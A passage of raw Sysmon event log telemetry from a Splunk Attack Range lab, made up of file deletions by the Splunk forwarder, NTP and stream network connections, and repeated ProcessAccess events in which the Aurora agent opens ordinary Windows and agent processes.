Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0DC5B03F87848031A72985187345190,SHA256=39F7DAA73716A4CA2BC9B9005EB3BEE08F832DD2141D6A22EDDBAD73FEDACF09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041765Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:39.690{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05C4D2B1A37F7D2893DCB74279F85235,SHA256=8250C2E0F9724B8D1804AE67228DD0059A9FCA9EA9FE20A27EFB6F82FFBEFBE9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016422Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:40.885{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99C54ECE47BD9E9317BB8D55479BF6A9,SHA256=0AF7249702274B96E04D9DDACEE37A624E8A972884F2B1D2FF89C232AEE4DACA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041767Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:40.791{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F7ADA632F29EDB05BBC77934E33C7DE,SHA256=736C5D6B2AD1C6F208DB59D8C5CB4DD44C2F1E5EE1724C190EC062EF1BA5BA48,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000041766Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:21:40.030{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d92b37-0x6ade9d5a) 23542300x800000000000000016423Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:41.964{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8317D610DD2BB33E96DF73143CB20369,SHA256=F2BFC81F7ABC6572733EE094E40F40E94EF23824F120A07EE95186CE7D40CEE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041771Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:41.896{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43FB43355E5083D1A0CF804453E03B83,SHA256=BAC0102DDD857F7E118FF3C020794D505EE7B642E8EB1834E8BD6E4AA24DAEE9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000041770Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:39.495{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local123ntpfalse169.254.169.123-123ntp 354300x800000000000000041769Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:38.665{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56293-false10.0.1.12-8000- 23542300x800000000000000041768Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:41.031{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=612F69EAA82DF54E42682841E3053B3B,SHA256=1C5358B4D83A13E0F98ED994745DEF3280343164F3660A07893BD97D694320D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041772Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:42.983{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF0726371BD53590A241C31EF701758C,SHA256=544BB20E1F68F5F2EFBDF3BDF7440FE5CD07ABE927F8BEDBAA92D28247A20ED2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016454Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.726{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016453Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.722{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016452Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.720{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016451Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.711{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016450Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.709{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016449Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.708{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016448Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.707{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016447Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.704{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016446Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.703{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016445Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.700{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016444Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.699{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016443Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.690{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016442Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.687{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016441Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.686{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016440Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.678{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016439Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.677{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016438Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.670{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016437Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.663{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016436Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.647{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016435Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.641{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016434Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.634{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016433Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.627{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016432Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.621{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016431Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.582{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016430Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.576{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000016429Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:42.570{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program 